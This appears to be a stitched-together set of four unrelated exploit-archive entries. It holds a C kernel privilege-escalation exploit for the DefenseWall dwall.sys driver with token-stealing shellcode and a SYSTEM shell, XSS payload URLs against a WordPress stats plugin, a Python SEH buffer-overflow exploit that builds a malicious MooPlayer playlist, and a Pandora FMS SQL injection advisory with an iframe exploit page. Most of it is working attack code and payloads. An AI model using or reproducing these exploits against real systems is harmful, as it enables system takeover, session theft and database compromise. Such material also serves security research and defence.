/* Subset of the NT SYSTEM_INFORMATION_CLASS values. Only
   SystemModuleInformation is used in the visible code. */
typedef enum _SYSTEM_INFORMATION_CLASS { 
     SystemModuleInformation = 11,
     SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

/* Function-pointer type for ntdll!NtQuerySystemInformation, which is not
   exported through an import library and is resolved at runtime with
   GetProcAddress() in HalDispatchTableAddress(). */
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
     SYSTEM_INFORMATION_CLASS SystemInformationClass,
     PVOID SystemInformation,
     ULONG SystemInformationLength,
     PULONG ReturnLength);

/* Function-pointer type for ntdll!NtQueryIntervalProfile; declared here and
   used by main() below. */
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
     DWORD ProfileSource, 
     PULONG Interval);

/* Generic function-pointer alias; holds the GetProcAddress() result for the
   HalDispatchTable export so it can be rebased as an address. */
typedef void (*FUNCTPTR)(); 



// Windows XP SP3

#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct


/* Kernel-mode stub for Windows XP SP3 (offsets above). As annotated per
   instruction: walks ActiveProcessLinks to the process whose
   UniqueProcessId is 4 (System), copies its TOKEN over the current
   process's TOKEN, and returns with "ret 8". Any change to the XP_*
   offsets must be mirrored in the hard-coded instruction encodings. */
BYTE token_steal_xp[] =
{
  0x52,                                                  // push edx                       Save edx on the stack
  0x53,	                                                 // push ebx                       Save ebx on the stack
  0x33,0xc0,                                             // xor eax, eax                   eax = 0
  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax
  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x5b,                                                  // pop ebx                        Restores ebx
  0x5a,                                                  // pop edx                        Restores edx
  0xc2,0x08                                              // ret 8                          Away from the kernel    
};



/*
 * Resolves the kernel-mode address of the kernel's HalDispatchTable export:
 * reads the loaded-module list to get the kernel image name and base, loads
 * the same image into this process, and rebases the user-space export
 * address onto the real kernel base.
 *
 * Returns the kernel address, or -1 on any failure. Because the return type
 * is DWORD, -1 is 0xFFFFFFFF; callers must compare against that, not 0.
 */
DWORD HalDispatchTableAddress() 
{
    _NtQuerySystemInformation    NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
    DWORD                        HalDispatchTable;
    CHAR                         kFullName[256];
    PVOID                        kBase = NULL;
    LPSTR                        kName;
    HMODULE                      Kernel;
    FUNCTPTR                     Hal;
    ULONG                        len;
    NTSTATUS                     status;


    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
 	
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;  
    }

    /* First call passes a NULL buffer only to learn the required length.
       NOTE(review): that call is expected to return a non-zero
       length-mismatch status, so `if (!status)` reports an error on the
       successful (zero) case; the condition looks inverted - confirm. */
    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);

    if (!status) 
    {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
        return -1;
    }
		
    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);

    if(pModuleInfo == NULL)
    {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return -1;
    }

    /* NOTE(review): the status of this second call is never checked, and
       pModuleInfo is never released with GlobalFree() on any path. */
    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
	
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;

    printf("[i] Kernel base name %s\n", kFullName);
    /* NOTE(review): strrchr() returns NULL when ImageName has no backslash;
       ++kName would then hand an invalid pointer to LoadLibraryA. */
    kName = strrchr(kFullName, '\\');

    Kernel = LoadLibraryA(++kName);

    if(Kernel == NULL) 
    {
        printf("[-] Failed to load kernel base\n\n");
        return -1;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");

    if(Hal == NULL)
    {
        printf("[-] Failed to find HalDispatchTable\n\n");
        return -1;
    }
    
    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
    printf("[i] Kernel handle 0x%08x\n", Kernel);
    printf("[i] Kernel base address 0x%08x\n", kBase);          

    /* Rebase: (export address - user-space module base) is the RVA; add the
       real kernel base to get the kernel-mode address. */
    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);

    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

    if(!HalDispatchTable)
    {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return -1;
    }

    return HalDispatchTable;
}


/*
 * Classify the running Windows version into the small tag main() tests:
 *   1 = Windows XP (5.1), 2 = Windows 7 (6.1), 3 = Windows Server 2003 (5.2),
 *   0 = anything else.
 *
 * Only the low word of GetVersion() is consulted: its low byte carries the
 * major version and its high byte the minor version.  Every version that
 * is not one of the three listed above yields 0.
 */
int GetWindowsVersion()
{
    DWORD packed = GetVersion();
    DWORD major  = (DWORD)LOBYTE(LOWORD(packed));
    DWORD minor  = (DWORD)HIBYTE(LOWORD(packed));

    /* Fold both bytes into 0xMMmm so a single switch covers the pairs. */
    switch ((major << 8) | minor)
    {
    case 0x0501: return 1;  /* Windows XP */
    case 0x0601: return 2;  /* Windows 7 */
    case 0x0502: return 3;  /* Windows Server 2003 */
    default:     return 0;
    }
}


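/*
 * Launch a new cmd.exe in its own console and return without waiting.
 *
 * main() calls this after the kernel payload has been triggered (see the
 * NtQueryIntervalProfile() call there); the "SYSTEM Shell" banner printed
 * by main() is the author's expectation that the process token has been
 * replaced by then.  This function itself does nothing privilege-related:
 * it is a plain CreateProcessA() of "cmd.exe".  On failure it prints
 * GetLastError() and returns; on success only the child's handles are
 * closed, so the shell keeps running.
 *
 * Changes from the original: the duplicated si.cb assignment is gone, the
 * ANSI entry point is named explicitly (STARTUPINFOA is used, so the
 * CreateProcess macro would not compile under UNICODE anyway), the command
 * line lives in a writable array as the API contract asks, and the error
 * code is printed with %lu because GetLastError() returns a DWORD.
 */
void spawnShell()
{
    STARTUPINFOA        si;
    PROCESS_INFORMATION pi;
    char                cmdLine[] = "cmd.exe";   /* lpCommandLine must be writable */

    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));

    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    /* bInheritHandles is TRUE, so the child receives every inheritable
     * handle of this process (kept from the original call). */
    if (!CreateProcessA(NULL, cmdLine, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%lu)\n\n", GetLastError());
        return;
    }

    /* Release our references only; the new process is not waited for. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}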



/*
 * Entry point.  The flow, in the order it appears below:
 *   1. print the banner; abort only when GetWindowsVersion() returned 0;
 *   2. resolve NtQueryIntervalProfile() from ntdll.dll;
 *   3. VirtualAlloc() an RWX buffer of BUFSIZE bytes (BUFSIZE is defined
 *      outside this excerpt), fill it with 0x90 and copy token_steal_xp
 *      (also defined outside this excerpt) to its start;
 *   4. open the \\.\dwall device;
 *   5. take HalDispatchTableAddress() + 4 as the kernel address to write;
 *   6. DeviceIoControl() 0x00222000 with the buffer's address as the input
 *      buffer and that kernel address as the *output* buffer (per the
 *      author's comment, the driver copies input to the output address);
 *   7. NtQueryIntervalProfile(2, ...) as the trigger, then spawnShell().
 * Returns 0 on the happy path and -1 from every earlier error path.
 */
int main(int argc, char *argv[]) 
{

    _NtQueryIntervalProfile     NtQueryIntervalProfile;
    LPVOID                      input[1] = {0};    
    LPVOID                      addrtoshell;
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;
    DWORD                       HalDispatchTableTarget;
    ULONG                       time = 0;
    unsigned char               devhandle[MAX_PATH]; 


    printf("-------------------------------------------------------------------------------\n");
    printf("    SoftSphere DefenseWall FW/HIPS (dwall.sys) Arbitrary Write EoP Exploit     \n");
    printf("                         Tested on Windows XP SP3 (32bit)                      \n");
    printf("-------------------------------------------------------------------------------\n\n");

    if (GetWindowsVersion() == 1) 
    {
        printf("[i] Running Windows XP\n");
    }

    /* NOTE(review): only the "unknown" result (0) aborts.  GetWindowsVersion()
     * also returns 2 (Windows 7) and 3 (Server 2003); those continue into the
     * XP-specific token_steal_xp payload although the banner claims XP only. */
    if (GetWindowsVersion() == 0) 
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }  

    /* devhandle is unsigned char[] while sprintf()/CreateFile() take char*;
     * expect sign-mismatch warnings from a strict compiler. */
    sprintf(devhandle, "\\\\.\\%s", "dwall");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
 	
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;  
    }
   
    /* RWX allocation: the buffer is both written (memset/memcpy) and, by
     * the author's intent, later executed. */
    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    /* NOTE(review): HalDispatchTableAddress() returns -1 on each of its
     * failure paths (see its body above); that sentinel is never checked
     * here before 4 is added and the value is handed to the driver. */
    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
                    
    printf("[+] Input buffer contents %08x\n", input[0]);
 	
    printf("[~] Press any key to send Exploit  . . .\n");
    getch();   /* MSVC conio.h, not standard C */

    /* Neither the return value nor dwRetBytes is examined, so a rejected
     * IOCTL still falls through to the trigger below. */
    DeviceIoControl(hDevice, 0x00222000, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

    printf("[+] Buffer sent\n");
    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    /* Presumably the system call whose kernel path calls through the
     * HalDispatchTable+4 entry written above -- nothing on this page shows
     * that; confirm against the kernel before relying on it. */
    NtQueryIntervalProfile(2, &time);
    spawnShell();

    return 0;
}
            
source: https://www.securityfocus.com/bid/49197/info

WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]
            
#!/usr/bin/env python
#################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow      #
# Date Discovered: 10-02-2015                                   #
# Author: dogo h@ck                                             #
# Vulnerable Software: Moo player 1.3.0                         #
# Software Link: https://mooplayer.jaleco.com/                  #
# Version: 1.3.0                                                #
# Tested On: Windows XP SP3                                     #
#################################################################
#BadCharacters = ("\x00\x0a\x0d")                               #
#################################################################

# Layout of the generated playlist entry (sizes taken from the assignments
# below): "http://" + 264 bytes of 'A' + 4-byte nSEH + 4-byte SEH + shellcode,
# padded with 'D' up to `buffer` (10000) bytes.  The SEH value is an address
# inside OLEACC.dll according to the author's comment.
head="http://"
buffer=10000          # total entry length; also shadows the Python 2 builtin `buffer`
junk = "\x41" * 264
nseh = "\xeb\x06\x90\x90" 
seh = "\xe2\x69\xc8\x74"  #74C869E2 OLEACC.dll || Path=C:\WINDOWS\system32\OLEACC.dll

# Windows XP SP3 English MessageBoxA Shellcode
# (raw x86 bytes; the two inline addresses are the author's annotations)

shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x20\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" # 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" # 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0")

poc = head + junk + nseh + seh + shellcode
junk1 = "\x44"*(buffer-len(poc))   # pad so the whole entry is exactly `buffer` bytes
poc += junk1
file = "payload.m3u"   # shadows the Python 2 builtin `file`
f=open(file,"w")
# NOTE(review): `head` is already the first component of `poc` (see the
# `poc =` line), so the file starts with "http://http://".  Whether the
# 264-byte offset was tuned with that doubled prefix cannot be told from here.
# Text-mode write of \x80+ escapes is byte-exact only under Python 2; under
# Python 3 they would be UTF-8 encoded and the layout would change.
f.write(head + poc);
f.close();
            
Document Title:
===============
Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1355


Release Date:
=============
2015-02-09


Vulnerability Laboratory ID (VL-ID):
====================================
1355


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement 
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ 
new technology market. 

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.


    * Get SNMP Traps from generic network devices. 
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module. 
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction. 
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerability in the official Pandora FMS monitoring web-application.


Vulnerability Disclosure Timeline:
==================================
2015-02-09:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Artica Soluciones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote SQL injection web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows remote attackers and low privileged application user accounts to execute unauthorized SQL commands 
that compromise the affected monitoring web-application and DBMS.

The vulnerability is located in the `offset` value of the index list context module. Remote attackers and low privileged application 
user accounts are able to execute their own SQL commands via a GET method request. The attacker can prepare a request through the `agentes` 
module to inject their own SQL commands into the affected web-application's DBMS.

The security risk of the SQL injection vulnerability is estimated as critical, with a CVSS (Common Vulnerability Scoring System) score of 6.3.
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] agentes
				[+] agents_modules

Vulnerable Parameter(s):
				[+] offset


Proof of Concept (PoC):
=======================
The SQL injection web vulnerabilities can be exploited by local low privileged application user accounts in godmode without user interaction.
To demonstrate or reproduce the vulnerability, follow the information and steps provided below.

PoC:
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60
http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--


--- SQL Error Session Logs ---
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 1 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 28 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY utimestamp DESC LIMIT 10' at line 4 ('SELECT * FROM tevento WHERE id_agente = -1' AND estado <> 1 ORDER BY utimestamp DESC LIMIT 10') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ('SELECT notinit_count FROM tagente WHERE id_agente = -1'') in /var/www/html/pandora/include/db/mysql.php


PoC: Exploit (html & js)

<html>
<head><body>
<title>Pandora FMS - SQL Injection Exploit</title>
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60>
<iframe src=http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
</head></body>
</html>

... or

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EPandora%20FMS%20-%20SQL%20Injection%20Exploit%3C/title%3E%0A%3Ciframe%20src%3D
http%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26refr%3D60%26group_id%3D0%26search%3D%26sort_field%3D
%26sort%3Dnone%26status%3D0%26offset%3D-1%2527-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D2592000%26refresh%3DRefresh%2520path%26offset%3D-1%2527-%5B
SQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26
group_id%3D0%26search%3D%26sort_field%3D%26sort%3Dnone%26status%3D-1%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%26refr%3D60%3E%0A%3Ciframe%20src%3Dhttp%3A
//fms.localhost%3A8080/pandora/index.php%3F%26sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D-%5BSQL%20INJECTION%20
VULNERABILITY%21%5D%27--%26refresh%3D%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
sec%3Destado%26sec2%3Doperation/agentes


Reference(s):
http://fms.localhost:8080/pandora/index.php
http://fms.localhost:8080/pandora/include/db/mysql.php


Solution - Fix & Patch:
=======================
The issue can be patched by implementing a prepared statement that prevents the execution of SQL commands through the weak values.
Encode and parse the vulnerable `offset` value in all the marked modules to prevent further executions or information disclosure. Since the logged queries show `offset` reaching the query directly as a numeric LIMIT argument, casting it to an integer before it is used is the simplest form of that check.


Security Risk:
==============
The security risk of the remote SQL injection vulnerability in the Pandora FMS application is estimated as high. (CVSS 6.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH 



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
